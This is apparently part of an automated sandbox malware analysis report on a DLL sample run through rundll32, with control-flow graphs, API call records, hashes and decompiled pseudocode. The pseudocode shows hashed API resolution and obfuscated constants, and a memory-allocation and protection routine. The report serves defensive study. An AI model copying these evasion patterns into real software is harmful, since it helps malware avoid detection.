                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                      • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                      • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                      • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 250 10001a83-10001a9e call 10001990 247->250 251 10001a1d-10001a2a 247->251 249 10001b0b-10001b0e 248->249 260 10001aa0-10001aa2 250->260 261 10001aa4-10001ac9 VirtualAlloc 250->261 253 10001a2c-10001a4e VirtualAlloc 251->253 254 10001a7e 251->254 255 10001a50-10001a52 253->255 256 10001a57-10001a7b call 100017c0 253->256 254->246 255->249 256->254 260->249 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->249 264->248
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00687F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 275 687f5d-687ff1 call 6920b9 call 69aa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0068AD99,?,?,?,181C8C04,0068AD99), ref: 00687FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction ID: 7576642a5d44f4b66246caf129839fc351bcdb0a8729686c397601973a8d5a10
                                                                                                                      • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction Fuzzy Hash: 5911D372402128BBDF619F91DD09CEF7FBAEF093A4F149144FA1921121D2728A60EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006946BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 6946bb-69473b call 6920b9 call 69aa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E006946BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E006920B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0069AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                      0x006946d5
                                                                                                                      0x006946da
                                                                                                                      0x006946e4
                                                                                                                      0x006946ec
                                                                                                                      0x006946f3
                                                                                                                      0x006946f7
                                                                                                                      0x006946fe
                                                                                                                      0x00694705
                                                                                                                      0x0069470c
                                                                                                                      0x00694724
                                                                                                                      0x00694735
                                                                                                                      0x0069473b

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00694735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 8138711db78f60cb7f6d67080d35c8f170a005f8e593411a981c7ebdf95e3557
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: 46012C75801218BBCF15AFD5DC098DFBFB9EF45394F108149F91826211D2758A60DBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006893ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 6893ed-689461 call 69aa30 ExitProcess
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E006893ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0069AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                      0x006893f3
                                                                                                                      0x00689405
                                                                                                                      0x00689411
                                                                                                                      0x00689412
                                                                                                                      0x00689413
                                                                                                                      0x0068941a
                                                                                                                      0x00689421
                                                                                                                      0x00689428
                                                                                                                      0x00689433
                                                                                                                      0x00689436
                                                                                                                      0x0068943d
                                                                                                                      0x00689444
                                                                                                                      0x00689451
                                                                                                                      0x0068945b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 0068945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction ID: 505c56e86cc1302ab4807bd98990568a020ef5aa2fa044f323597b4455b5668e
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: D4F03C71901308FBEB44DBE8DA4699DFBF4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 305 68b23c-68b2c6 call 6920b9 call 69aa30 lstrcmpiW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0068B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006920B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0069AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                      0x0068b23f
                                                                                                                      0x0068b240
                                                                                                                      0x0068b241
                                                                                                                      0x0068b244
                                                                                                                      0x0068b247
                                                                                                                      0x0068b24a
                                                                                                                      0x0068b24e
                                                                                                                      0x0068b24f
                                                                                                                      0x0068b254
                                                                                                                      0x0068b25e
                                                                                                                      0x0068b26a
                                                                                                                      0x0068b271
                                                                                                                      0x0068b278
                                                                                                                      0x0068b27f
                                                                                                                      0x0068b286
                                                                                                                      0x0068b28d
                                                                                                                      0x0068b294
                                                                                                                      0x0068b29b
                                                                                                                      0x0068b2b3
                                                                                                                      0x0068b2c1
                                                                                                                      0x0068b2c6

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0068B2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 1f19db0def396c92a94c70fda46dd9b9bd9d83b8bb10be5a5c2972b251748b5a
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: 1B011A72C04608FFDF45DFD4DD468AEBBB5EB44304F108188B90566152E3714B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 0069E395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 79%
                                                                                                                      			E0069E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E006920B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
				_v288 = _v288 / _t963;
				_v288 = _v288 ^ 0x0002fb4b;
				_v284 = 0xb301d9;
				_t964 = 0x4e;
				_v284 = _v284 / _t964;
				_v284 = _v284 + 0x8c1d;
				_v284 = _v284 ^ 0x00061f34;
				_v280 = 0xfdcbf7;
				_v280 = _v280 + 0x27a;
				_v280 = _v280 + 0xffff891b;
				_t965 = 0x46;
				_v280 = _v280 / _t965;
				_v280 = _v280 ^ 0x0008575c;
				_v284 = 0xc1d3a0;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 << 2;
				_v284 = _v284 ^ 0x000b0f76;
				_v112 = 0xeee25;
				_v112 = _v112 << 0xc;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xee2c14e7;
				_v180 = 0x8a49b3;
				_v180 = _v180 | 0xb0d6dc69;
				_v180 = _v180 + 0xffffa02a;
				_v180 = _v180 | 0x7fd27f38;
				_v180 = _v180 ^ 0xffd81443;
				_v152 = 0x628374;
				_v152 = _v152 >> 2;
				_v152 = _v152 + 0xffff73d9;
				_t966 = 0x2e;
				_v152 = _v152 / _t966;
				_v152 = _v152 ^ 0x0001ef4a;
				_v28 = 0xe4a1af;
				_v28 = _v28 + 0x32bc;
				_v28 = _v28 ^ 0x00ec33da;
				_v160 = 0x595a50;
				_v160 = _v160 + 0xffffdbfa;
				_v160 = _v160 + 0xffffb344;
				_t967 = 0x36;
				_v160 = _v160 / _t967;
				_v160 = _v160 ^ 0x0006861f;
				_v88 = 0x4d7ad3;
				_v88 = _v88 + 0xc28a;
				_v88 = _v88 ^ 0x004ca34c;
				_v48 = 0xf1782b;
				_v48 = _v48 ^ 0xe8a77c51;
				_v48 = _v48 ^ 0xe85593aa;
				_v100 = 0x42ea8e;
				_t985 = 0x2a;
				_v100 = _v100 / _t985;
				_v100 = _v100 ^ 0x000caa85;
				_v148 = 0xa48e68;
				_t968 = 6;
				_v148 = _v148 / _t968;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xb6d58e9e;
				_v252 = 0x4ff2e7;
				_t969 = 0xc;
				_v252 = _v252 / _t969;
				_v252 = _v252 << 6;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xa6466867;
				_v80 = 0x4d7637;
				_v80 = _v80 + 0xd199;
				_v80 = _v80 ^ 0x004dfa45;
				_v24 = 0xfee4b3;
				_t970 = 0x3e;
				_v24 = _v24 * 0x23;
				_v24 = _v24 ^ 0x22d37c34;
				_v204 = 0x24209;
				_v204 = _v204 + 0xffffcebc;
				_v204 = _v204 ^ 0x847f2e61;
				_v204 = _v204 + 0xffff5302;
				_v204 = _v204 ^ 0x847f4f7c;
				_v260 = 0x4a587;
				_v260 = _v260 * 0x4a;
				_v260 = _v260 + 0xffff9bf3;
				_v260 = _v260 + 0xffff92e5;
				_v260 = _v260 ^ 0x015b504d;
				_v164 = 0x6d05db;
				_v164 = _v164 * 0x14;
				_v164 = _v164 >> 4;
				_v164 = _v164 ^ 0x556abaa4;
				_v164 = _v164 ^ 0x55e01079;
				_v20 = 0x80cc5b;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000efc86;
				_v104 = 0xc8e6e2;
				_v104 = _v104 << 8;
				_v104 = _v104 >> 0x10;
				_v104 = _v104 ^ 0x000afff3;
				_v272 = 0x560e69;
				_v272 = _v272 + 0x2793;
				_v272 = _v272 * 0xe;
				_v272 = _v272 + 0xc902;
				_v272 = _v272 ^ 0x04bc6edc;
				_v16 = 0xfcaf67;
				_v16 = _v16 / _t970;
				_v16 = _v16 ^ 0x000c0ba9;
				_v56 = 0x81a14f;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x000fb9cd;
				_v32 = 0x24333c;
				_v32 = _v32 / _t985;
				_v32 = _v32 ^ 0x00065bee;
				_v124 = 0xe3a445;
				_v124 = _v124 >> 5;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x0000dfdf;
				_v220 = 0x5f21d9;
				_t971 = 0x79;
				_v220 = _v220 * 0x54;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0e372a7b;
				_v220 = _v220 ^ 0xe8dc9c41;
				_v188 = 0xc44d01;
				_v188 = _v188 ^ 0x0373dd04;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0xfb03bbf0;
				_v188 = _v188 ^ 0x496460ca;
				_v268 = 0x8213af;
				_v268 = _v268 ^ 0x6d9501b2;
